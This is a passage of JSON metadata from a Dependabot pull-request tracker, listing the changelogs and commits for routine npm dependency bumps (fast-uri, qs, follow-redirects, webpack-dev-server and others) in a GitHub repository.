href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Wbaker7702/nemo/network/alerts).\n\n\u003c/details\u003e\n\n\u003c!-- This is an auto-generated description by cubic. --\u003e\n---\n## Summary by cubic\nUpgrade build/dev dependencies to pick up security fixes and improve the dev server. No app code changes; updates are patch-level and safe.\n\n- **Dependencies**\n  - `postcss` → 8.5.10: fixes XSS in non-bundler output; source map improvements.\n  - `webpack-dev-server` → 5.2.4: sets Cross-Origin-Resource-Policy header; overlay ESC to dismiss; upgrades `selfsigned`. Transitive bumps include `express` 4.22.2, `compression` 1.8.1, and `body-parser` 1.20.5.\n  - Security/bug fixes: `fast-uri` 3.1.2, `qs` 6.15.2, `follow-redirects` 1.16.0.\n  - `@babel/plugin-transform-modules-systemjs` → 7.29.7: module name and source map fixes.\n\n\u003csup\u003eWritten for commit 6bf6b7d363fab9b90487d84a7869a9671e696817. Summary will update on new commits.\u003c/sup\u003e\n\n\u003ca href=\"https://cubic.dev/pr/Wbaker7702/nemo/pull/238?utm_source=github\"\u003eReview in cubic\u003c/a\u003e\n\n\u003c!-- End of auto-generated description by cubic. --\u003e\n\n","html_url":"https://github.com/Wbaker7702/nemo/pull/238","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Wbaker7702%2Fnemo/issues/238","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/238/packages"}},{"old_version":"5.2.2","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-28T03:38:29.000Z","version_change":"5.2.2 → 5.2.4","issue":{"uuid":"4537547743","node_id":"PR_kwDOMake787gFfWh","number":129,"state":"closed","title":"Bump the npm_and_yarn group across 6 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T06:11:25.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-28T03:38:29.000Z","updated_at":"2026-05-30T06:11:27.000Z","time_to_close":181976,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"uuid","old_version":"13.0.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"@xmldom/xmldom","old_version":"0.8.12","new_version":"0.8.13","repository_url":"https://github.com/xmldom/xmldom"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.23.3","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"fast-uri","old_version":"3.0.6","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"ip-address","old_version":"10.0.1","new_version":"10.2.0","repository_url":"https://github.com/beaugunderson/ip-address"},{"name":"qs","old_version":"6.11.2","new_version":"6.13.0","repository_url":"https://github.com/ljharb/qs"},{"name":"tmp","old_version":"0.2.5","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [uuid](https://github.com/uuidjs/uuid) | `13.0.0` | `14.0.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.12` | `0.8.13` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.23.3` | `7.29.7` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.6` | `3.1.2` |\n| [ip-address](https://github.com/beaugunderson/ip-address) | `10.0.1` | `10.2.0` |\n| [qs](https://github.com/ljharb/qs) | `6.11.2` | `6.13.0` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.5` | `0.2.7` |\n\nBumps the npm_and_yarn group with 1 update in the /benchmark directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/studio-base directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /packages/studio-desktop directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server) and [@xmldom/xmldom](https://github.com/xmldom/xmldom).\nBumps the npm_and_yarn group with 1 update in the /packages/studio-web directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /web directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 